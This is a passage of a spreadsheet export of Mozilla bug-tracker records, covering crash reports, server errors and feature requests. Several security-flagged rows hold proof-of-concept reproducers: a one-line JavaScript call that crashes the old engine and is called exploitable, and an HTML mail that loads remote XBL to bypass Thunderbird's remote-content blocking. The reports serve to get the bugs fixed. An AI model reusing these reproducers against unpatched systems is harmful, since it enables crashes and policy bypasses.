      <c r="C4938" t="inlineStr">
        <is>
          <t>Crash in _platform_memset_pattern16$VARIANT$Haswell</t>
        </is>
      </c>
      <c r="D4938" t="inlineStr">
        <is>
          <t>2020-06-05 00:04:29 -0700</t>
        </is>
      </c>
      <c r="E4938" t="n">
        <v>1</v>
      </c>
      <c r="F4938" t="n">
        <v>1</v>
      </c>
      <c r="G4938" t="n">
        <v>3</v>
      </c>
      <c r="H4938" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4938" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4938" t="inlineStr">
        <is>
          <t>Safe Browsing</t>
        </is>
      </c>
      <c r="K4938" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4938" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4938" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4938" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4938" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4938" t="inlineStr">
        <is>
          <t>[fixed by bug 1542744?][post-critsmash-triage][adv-main68+]</t>
        </is>
      </c>
      <c r="Q4938" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4938" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4938" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T4938" t="n">
        <v>1</v>
      </c>
      <c r="U4938" t="n">
        <v>0</v>
      </c>
      <c r="V4938" t="n">
        <v>17</v>
      </c>
      <c r="W4938" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-707fa780-789b-4847-a56d-1d4500181127.
=============================================================
Seen while looking at release crash stats: https://bit.ly/2TVWSGK. Mac only crash that affects 10.12-10.14. No extension correlations come up for any of the branches, but I did notice Version 2.8 of fxmonitor is present in quite a few of the crash reports I looked at.
Volume is not super huge, but some interesting comments regarding Firefox crashing while in the background. 
Top 10 frames of crashing thread:
0 libsystem_platform.dylib _platform_memset_pattern16$VARIANT$Haswell 
1 XUL nsUrlClassifierPrefixSet::MakePrefixSet xpcom/ds/nsTArray-inl.h:13
2 XUL nsUrlClassifierPrefixSet::SetPrefixes toolkit/components/url-classifier/nsUrlClassifierPrefixSet.cpp:104
3 XUL mozilla::safebrowsing::VariableLengthPrefixSet::SetPrefixes toolkit/components/url-classifier/VariableLengthPrefixSet.cpp:106
4 XUL mozilla::sZeroToNineMask 
5 XUL mozilla::safebrowsing::Classifier::UpdateTableV4 toolkit/components/url-classifier/LookupCacheV4.cpp:151
6 XUL mozilla::sZeroToNineMask 
7 XUL mozilla::safebrowsing::Classifier::ApplyUpdatesBackground toolkit/components/url-classifier/Classifier.cpp:831
8 libmozglue.dylib arena_t::GetNonFullBinRun memory/build/rb.h:144
9  @0x37560f0f8a23 
=============================================================</t>
        </is>
      </c>
      <c r="X4938" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4939">
      <c r="A4939" t="n">
        <v>753692</v>
      </c>
      <c r="B4939" t="inlineStr">
        <is>
          <t>2012-05-10 02:48:58 -0700</t>
        </is>
      </c>
      <c r="C4939" t="inlineStr">
        <is>
          <t>Long-running query times out after 30 seconds, and throws a 500 Internal Server Error</t>
        </is>
      </c>
      <c r="D4939" t="inlineStr">
        <is>
          <t>2013-07-02 10:50:34 -0700</t>
        </is>
      </c>
      <c r="E4939" t="n">
        <v>1</v>
      </c>
      <c r="F4939" t="n">
        <v>1</v>
      </c>
      <c r="G4939" t="n">
        <v>4</v>
      </c>
      <c r="H4939" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4939" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4939" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K4939" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4939" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4939" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4939" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4939" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4939" t="inlineStr"/>
      <c r="Q4939" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R4939" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4939" t="inlineStr">
        <is>
          <t>51</t>
        </is>
      </c>
      <c r="T4939" t="n">
        <v>1</v>
      </c>
      <c r="U4939" t="n">
        <v>0</v>
      </c>
      <c r="V4939" t="n">
        <v>8</v>
      </c>
      <c r="W4939" t="inlineStr">
        <is>
          <t>Created attachment 622664
Screenshot
https://crash-stats.mozilla.com/query/query?product=Firefox&amp;version=ALL%3AALL&amp;range_value=3&amp;range_unit=weeks&amp;date=05%2F10%2F2012+09%3A34%3A59&amp;query_search=signature&amp;query_type=contains&amp;query=&amp;reason=&amp;build_id=&amp;process_type=any&amp;hang_type=any&amp;do_query=1 throws a 500, and takes the default 30 seconds-timeout to do so.</t>
        </is>
      </c>
      <c r="X4939" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4940">
      <c r="A4940" t="n">
        <v>452786</v>
      </c>
      <c r="B4940" t="inlineStr">
        <is>
          <t>2008-08-29 07:34:11 -0700</t>
        </is>
      </c>
      <c r="C4940" t="inlineStr">
        <is>
          <t>Crash due to insufficient class checking in Date class</t>
        </is>
      </c>
      <c r="D4940" t="inlineStr">
        <is>
          <t>2010-08-27 01:45:52 -0700</t>
        </is>
      </c>
      <c r="E4940" t="n">
        <v>1</v>
      </c>
      <c r="F4940" t="n">
        <v>1</v>
      </c>
      <c r="G4940" t="n">
        <v>3</v>
      </c>
      <c r="H4940" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4940" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4940" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4940" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4940" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4940" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4940" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4940" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4940" t="inlineStr">
        <is>
          <t>[sg:critical?] post 1.8 branch</t>
        </is>
      </c>
      <c r="Q4940" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4940" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4940" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4940" t="n">
        <v>1</v>
      </c>
      <c r="U4940" t="n">
        <v>0</v>
      </c>
      <c r="V4940" t="n">
        <v>17</v>
      </c>
      <c r="W4940" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Build Identifier: 
This bug crashes the browser without any possibility for user intervention. This is exploitable in the browser. Do *not* click the given link if you want to keep anything in your current Firefox session.
Reproducible: Always
Steps to Reproduce:
  (new Date()).getMonth.call(new Function())
Actual Results:  
jsshell (or Firefox) crash.
Expected Results:  
Exception.
The built-in Date class doesn't check the class of its "this" object sufficiently. Affected methods are getYear(), getMonth(), getDate() and so on.
This affects all of Date's methods that internally call GetLocalTime() (in jsdate.c) which doesn't check the class of object passed in (compare with JS_InstanceOf() call in GetUTCTime()). The object passed in needs to have at least 2 private slots, like
 a) the global object
 b) Function objects
 c) Iterator objects
The value from the private slot is passed to JSVAL_TO_DOUBLE() without further checks in GetLocalTime(), leading to bogus pointer dereference for objects not of class Date.
In addition to adding this to the test suite, this sort of thing could be added to jsparsefuzz.js (i.e. the fuzzer should be modified to use &lt;method&gt;.call() with random arguments if it's not already doing this).
I don't have time right now to check out a current tree and post a patch and will not get around to it until some time next week.</t>
        </is>
      </c>
      <c r="X4940" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4941">
      <c r="A4941" t="n">
        <v>475971</v>
      </c>
      <c r="B4941" t="inlineStr">
        <is>
          <t>2009-01-29 09:31:15 -0800</t>
        </is>
      </c>
      <c r="C4941" t="inlineStr">
        <is>
          <t>js_CheckRedeclaration does not always unlock object on failures</t>
        </is>
      </c>
      <c r="D4941" t="inlineStr">
        <is>
          <t>2009-10-14 16:40:45 -0700</t>
        </is>
      </c>
      <c r="E4941" t="n">
        <v>1</v>
      </c>
      <c r="F4941" t="n">
        <v>1</v>
      </c>
      <c r="G4941" t="n">
        <v>3</v>
      </c>
      <c r="H4941" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4941" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4941" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4941" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4941" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4941" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4941" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4941" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4941" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed-in-tracemonkey - fixed by 476049</t>
        </is>
      </c>
      <c r="Q4941" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4941" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4941" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4941" t="n">
        <v>1</v>
      </c>
      <c r="U4941" t="n">
        <v>0</v>
      </c>
      <c r="V4941" t="n">
        <v>19</v>
      </c>
      <c r="W4941" t="inlineStr">
        <is>
          <t>The contract for js_CheckRedeclaration is to always call OBJ_DROP_PROPERTY on failures. But this does not happen when the caller passes non-null objp/propp. For objects shared between threads this leads to unbalanced js_(Lock/Unlock)Object. The example below demonstrates this. Currently it hangs when run in a thread-safe shell.
Note this probably is not reproducible in the browser as even with thread workers no objects should be shared between threads.  
function x() { return 1; };
// g must run sufficiently long to ensure that the global scope is accessed                                                                                        
// from the parallel threads.                                                                                                                                      
function g()
{
    var sum = 0;
    try {
        for (var i = 0; i != 10000; ++i) {
            sum += x();
        }
    } catch (e) { }
}
scatter([g, g]);
try {
    eval("const x = 1");
} catch (e) { }
scatter([g, g]);
print("Done");</t>
        </is>
      </c>
      <c r="X4941" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4942">
      <c r="A4942" t="n">
        <v>882716</v>
      </c>
      <c r="B4942" t="inlineStr">
        <is>
          <t>2013-06-13 08:54:44 -0700</t>
        </is>
      </c>
      <c r="C4942" t="inlineStr">
        <is>
          <t>Implement "tabs from last session" sub-fragment in the new about:home</t>
        </is>
      </c>
      <c r="D4942" t="inlineStr">
        <is>
          <t>2020-12-21 10:31:17 -0800</t>
        </is>
      </c>
      <c r="E4942" t="n">
        <v>1</v>
      </c>
      <c r="F4942" t="n">
        <v>1</v>
      </c>
      <c r="G4942" t="n">
        <v>6</v>
      </c>
      <c r="H4942" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4942" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J4942" t="inlineStr">
        <is>
          <t>Awesomescreen</t>
        </is>
      </c>
      <c r="K4942" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4942" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4942" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4942" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4942" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4942" t="inlineStr">
        <is>
          <t>fixed-fig</t>
        </is>
      </c>
      <c r="Q4942" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4942" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4942" t="inlineStr">
        <is>
          <t>Firefox 26</t>
        </is>
      </c>
      <c r="T4942" t="n">
        <v>1</v>
      </c>
      <c r="U4942" t="n">
        <v>0</v>
      </c>
      <c r="V4942" t="n">
        <v>9</v>
      </c>
      <c r="W4942" t="inlineStr">
        <is>
          <t>Tapping on the "Tabs from last session" button should open a new fragment inside homepager.</t>
        </is>
      </c>
      <c r="X4942" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4943">
      <c r="A4943" t="n">
        <v>292589</v>
      </c>
      <c r="B4943" t="inlineStr">
        <is>
          <t>2005-05-02 02:29:18 -0700</t>
        </is>
      </c>
      <c r="C4943" t="inlineStr">
        <is>
          <t>[FIX]XBL load missing content policy check (Thunderbird not blocking remote content)</t>
        </is>
      </c>
      <c r="D4943" t="inlineStr">
        <is>
          <t>2007-04-01 15:00:10 -0700</t>
        </is>
      </c>
      <c r="E4943" t="n">
        <v>1</v>
      </c>
      <c r="F4943" t="n">
        <v>1</v>
      </c>
      <c r="G4943" t="n">
        <v>3</v>
      </c>
      <c r="H4943" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4943" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4943" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K4943" t="inlineStr">
        <is>
          <t>1.7 Branch</t>
        </is>
      </c>
      <c r="L4943" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4943" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4943" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4943" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4943" t="inlineStr">
        <is>
          <t>[sg:fix] have patch</t>
        </is>
      </c>
      <c r="Q4943" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4943" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4943" t="inlineStr">
        <is>
          <t>mozilla1.8beta2</t>
        </is>
      </c>
      <c r="T4943" t="n">
        <v>1</v>
      </c>
      <c r="U4943" t="n">
        <v>0</v>
      </c>
      <c r="V4943" t="n">
        <v>26</v>
      </c>
      <c r="W4943" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Thunderbird/1.0.2
Thunderbird doesn't block remote XBL, even though "Block loading of remote
images" setting is true.
Reproducible: Always
Steps to Reproduce:
create the following HTML mail, and receive it, and open it.
&lt;body&gt;
&lt;p&gt;If the remote XBL is loaded, a red box appears below.&lt;/p&gt;
&lt;p
style="-moz-binding:url(http://members.tripod.com/cv6y-mlr8-9hh/ixdc-5tn2/test.xml#x);"&gt;&lt;/p&gt;
&lt;/body&gt;
-----
http://members.tripod.com/cv6y-mlr8-9hh/ixdc-5tn2/test.xml is:
&lt;?xml version="1.0"?&gt;
&lt;bindings xmlns="http://www.mozilla.org/xbl"
          xmlns:xul="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"&gt;
  &lt;binding id="x"&gt;
    &lt;content&gt;
      &lt;xul:label value="This is the remote XBL content."
style="background-color: #f00;"/&gt;
    &lt;/content&gt;
  &lt;/binding&gt;
&lt;/bindings&gt;
Actual Results:  
The remote XBL is loaded.
Expected Results:  
The remote XBL is blocked.</t>
        </is>
      </c>
      <c r="X4943" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4944">
      <c r="A4944" t="n">
        <v>1577242</v>
      </c>
      <c r="B4944" t="inlineStr">
        <is>
          <t>2019-08-28 09:51:06 -0700</t>
        </is>
      </c>
      <c r="C4944" t="inlineStr">
        <is>
          <t>User Research Consultation for Firefox Accounts Preferences (Manage Account/Settings)</t>
        </is>
      </c>
      <c r="D4944" t="inlineStr">
        <is>
          <t>2019-11-14 14:02:55 -0800</t>
        </is>
      </c>
      <c r="E4944" t="n">
        <v>1</v>
      </c>
      <c r="F4944" t="n">
        <v>1</v>
      </c>
      <c r="G4944" t="n">
        <v>5</v>
      </c>
      <c r="H4944" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4944" t="inlineStr">
        <is>
          <t>User Research</t>
        </is>
      </c>
      <c r="J4944" t="inlineStr">
        <is>
          <t>Consultation</t>
        </is>
      </c>
      <c r="K4944" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4944" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4944" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4944" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4944" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4944" t="inlineStr"/>
      <c r="Q4944" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4944" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4944" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4944" t="n">
        <v>1</v>
      </c>
      <c r="U4944" t="n">
        <v>0</v>
      </c>
      <c r="V4944" t="n">
        <v>4</v>
      </c>
      <c r="W4944" t="inlineStr">
        <is>
          <t>**Request Description** 
We are evaluating the overall legibility of FxA settings in light of the inclusion of premium properties.
The goal of this exercise is to conduct a card sort on all elements of Firefox Accounts Settings: 
- Account picture
- Display name
- Secondary email
- Account recovery
- Two-step authentication
- Devices and apps
- Password
- Delete account
- Email preferences
- Subscriptions (Manage payment information Contact support)
This should be an open sort where we ask users to set their own categories.
We should also consider adding some sort of service-discovery option to the sort to reflect the possibility of adding the dandelion component to FxA's settings UI.
**Deadline** 
Q3
**Priority Level** 
2
**Priority Level Description** 
This rolls up to the relationships KPI and impacts scoped work to implement updates to FxA settings in Q4
**Supporting Information**
meeting notes: https://docs.google.com/document/d/1ENHnw6inCOKuWQ1W8qj9pU-XBEXF-25Yv9XxnbVVAlE/edit#heading=h.voh6hkc7vxaz</t>
        </is>
      </c>
      <c r="X4944" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4945">
      <c r="A4945" t="n">
        <v>625065</v>
      </c>
      <c r="B4945" t="inlineStr">
        <is>
          <t>2011-01-12 08:28:52 -0800</t>
        </is>
      </c>
      <c r="C4945" t="inlineStr">
        <is>
          <t>[traceback] Error in update_question_votes task</t>
        </is>
      </c>
      <c r="D4945" t="inlineStr">
        <is>
          <t>2011-01-25 12:07:38 -0800</t>
        </is>
      </c>
      <c r="E4945" t="n">
        <v>1</v>
      </c>
      <c r="F4945" t="n">
        <v>1</v>
      </c>
      <c r="G4945" t="n">
        <v>5</v>
      </c>
      <c r="H4945" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4945" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4945" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K4945" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4945" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4945" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4945" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4945" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4945" t="inlineStr"/>
      <c r="Q4945" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4945" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4945" t="inlineStr">
        <is>
          <t>2.4.3</t>
        </is>
      </c>
      <c r="T4945" t="n">
        <v>1</v>
      </c>
      <c r="U4945" t="n">
        <v>0</v>
      </c>
      <c r="V4945" t="n">
        <v>10</v>
      </c>
      <c r="W4945" t="inlineStr">
        <is>
          <t>When a user votes for a question, we fire off questions.tasks.update_question_votes. Occasionally this produces duplicate key errors.
====
Task questions.tasks.update_question_votes with id ac3c4b7f-be12-4afd-b297-19c6dbab1dae raised exception:
'IntegrityError(1062, "Duplicate entry \'776016\' for key 1")'
Task was called with args: (&lt;Question: On fox news website the comment box no longer appears. I can login for comments fine.  It was fine on an earlier version.&gt;,) kwargs: {}.
The contents of the full traceback was:
Traceback (most recent call last):
  File "/data/www/support.mozilla.com/kitsune/vendor/packages/celery/celery/execute/trace.py", line 34, in trace
    return cls(states.SUCCESS, retval=fun(*args, **kwargs))
  File "/data/www/support.mozilla.com/kitsune/vendor/packages/celery/celery/task/base.py", line 248, in __call__
    return self.run(*args, **kwargs)
  File "/data/www/support.mozilla.com/kitsune/vendor/packages/celery/celery/decorators.py", line 52, in run
    return fun(*args, **kwargs)
  File "/data/www/support.mozilla.com/kitsune/apps/questions/tasks.py", line 25, in update_question_votes
    q.save(no_update=True)
  File "/data/www/support.mozilla.com/kitsune/apps/questions/models.py", line 88, in save
    super(Question, self).save(*args, **kwargs)
  File "/data/www/support.mozilla.com/kitsune/vendor/src/django/django/db/models/base.py", line 434, in save
    self.save_base(using=using, force_insert=force_insert, force_update=force_update)
  File "/data/www/support.mozilla.com/kitsune/vendor/src/django/django/db/models/base.py", line 527, in save_base
    result = manager._insert(values, return_id=update_pk, using=using)
  File "/data/www/support.mozilla.com/kitsune/vendor/src/django/django/db/models/manager.py", line 195, in _insert
    return insert_query(self.model, values, **kwargs)
  File "/data/www/support.mozilla.com/kitsune/vendor/src/django/django/db/models/query.py", line 1479, in insert_query
    return query.get_compiler(using=using).execute_sql(return_id)
  File "/data/www/support.mozilla.com/kitsune/vendor/src/django/django/db/models/sql/compiler.py", line 783, in execute_sql
    cursor = super(SQLInsertCompiler, self).execute_sql(None)
  File "/data/www/support.mozilla.com/kitsune/vendor/src/django/django/db/models/sql/compiler.py", line 727, in execute_sql
    cursor.execute(sql, params)
  File "/data/www/support.mozilla.com/kitsune/vendor/src/django/django/db/backends/mysql/base.py", line 86, in execute
    return self.cursor.execute(query, args)
  File "/usr/lib64/python2.6/site-packages/MySQLdb/cursors.py", line 173, in execute
    self.errorhandler(self, exc, value)
  File "/usr/lib64/python2.6/site-packages/MySQLdb/connections.py", line 36, in defaulterrorhandler
    raise errorclass, errorvalue
IntegrityError: (1062, "Duplicate entry '776016' for key 1")</t>
        </is>
      </c>
      <c r="X4945" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4946">
      <c r="A4946" t="n">
        <v>1232707</v>
      </c>
      <c r="B4946" t="inlineStr">
        <is>
          <t>2015-12-15 09:01:13 -0800</t>
        </is>
      </c>
      <c r="C4946" t="inlineStr">
        <is>
          <t>Make a dist directory with code that's exportable to mozilla-central and confirm it'll work</t>
        </is>
      </c>
      <c r="D4946" t="inlineStr">
        <is>
          <t>2016-01-25 03:10:20 -0800</t>
        </is>
      </c>
      <c r="E4946" t="n">
        <v>1</v>
      </c>
      <c r="F4946" t="n">
        <v>1</v>
      </c>
      <c r="G4946" t="n">
        <v>6</v>
      </c>
      <c r="H4946" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4946" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J4946" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K4946" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4946" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4946" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4946" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4946" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4946" t="inlineStr">
        <is>
          <t>[github-addon-ship]</t>
        </is>
      </c>
      <c r="Q4946" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4946" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4946" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T4946" t="n">
        <v>1</v>
      </c>
      <c r="U4946" t="n">
        <v>0</v>
      </c>
      <c r="V4946" t="n">
        <v>44</v>
      </c>
      <c r="W4946" t="inlineStr">
        <is>
          <t>As part of our work, we need to be able to create a clean add-on directory that has just the code we need to export to mozilla-central.
See user story for more info.</t>
        </is>
      </c>
      <c r="X4946" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4947">
      <c r="A4947" t="n">
        <v>646968</v>
      </c>
      <c r="B4947" t="inlineStr">
        <is>
          <t>2011-03-31 13:18:08 -0700</t>
        </is>
      </c>
      <c r="C4947" t="inlineStr">
        <is>
          <t>let-block variable initializers are statically outside the let-scope but dynamically inside it</t>
        </is>
      </c>
      <c r="D4947" t="inlineStr">
        <is>
          <t>2015-10-16 11:38:42 -0700</t>
        </is>
      </c>
      <c r="E4947" t="n">
        <v>1</v>
      </c>
      <c r="F4947" t="n">
        <v>1</v>
      </c>
      <c r="G4947" t="n">
        <v>3</v>
      </c>
      <c r="H4947" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4947" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4947" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4947" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L4947" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4947" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4947" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4947" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4947" t="inlineStr">
        <is>
          <t>[sg:critical?]  [landed m-c 7/15][qa-] not exploitable on 1.9.2?</t>
        </is>
      </c>
      <c r="Q4947" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4947" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4947" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T4947" t="n">
        <v>1</v>
      </c>
      <c r="U4947" t="n">
        <v>0</v>
      </c>
      <c r="V4947" t="n">
        <v>41</v>
      </c>
      <c r="W4947" t="inlineStr">
        <is>
          <t>The EXPR in `let (x = EXPR) foo();` is supposed to be outside the scope of the lexical variable x being declared.
The compiler gets this right for names it can bind statically, but it still emits the bytecode for the expression *after* the JSOP_ENTERBLOCK instruction. That means the scope is wrong for plain old JSOP_NAME opcodes:
    var x = 5;
    let (x = x)
        assertEq(x, 5);                    // PASS
    let (x = eval("x"))
        assertEq(x, 5);                    // FAIL
    let (x = function () { with ({}) return x; })
        assertEq(x(), 5);                  // FAIL
    (let (x = x) assertEq(x, 5));          // PASS
    (let (x = eval("x")) assertEq(x, 5));  // FAIL
    (let (x = function () { with ({}) return x; }) assertEq(x(), 5)); // FAIL
I can't think of a clever way to fix this offhand.</t>
        </is>
      </c>
      <c r="X4947" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4948">
      <c r="A4948" t="n">
        <v>1745667</v>
      </c>
      <c r="B4948" t="inlineStr">
        <is>
          <t>2021-12-12 10:58:05 -0800</t>
        </is>
      </c>
      <c r="C4948" t="inlineStr">
        <is>
          <t>Crash in [@ PR_Unlock | nssTokenObjectCache_FindObjectsByTemplate | nssToken_FindObjectsByTemplate | nssToken_FindCertificateByIssuerAndSerialNumber | nssTrustDomain_UpdateCachedTokenCerts | PK11_DoPassword]</t>
        </is>
      </c>
      <c r="D4948" t="inlineStr">
        <is>
          <t>2022-08-27 22:30:59 -0700</t>
        </is>
      </c>
      <c r="E4948" t="n">
        <v>1</v>
      </c>
      <c r="F4948" t="n">
        <v>1</v>
      </c>
      <c r="G4948" t="n">
        <v>3</v>
      </c>
      <c r="H4948" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4948" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J4948" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K4948" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4948" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4948" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N4948" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4948" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4948" t="inlineStr">
        <is>
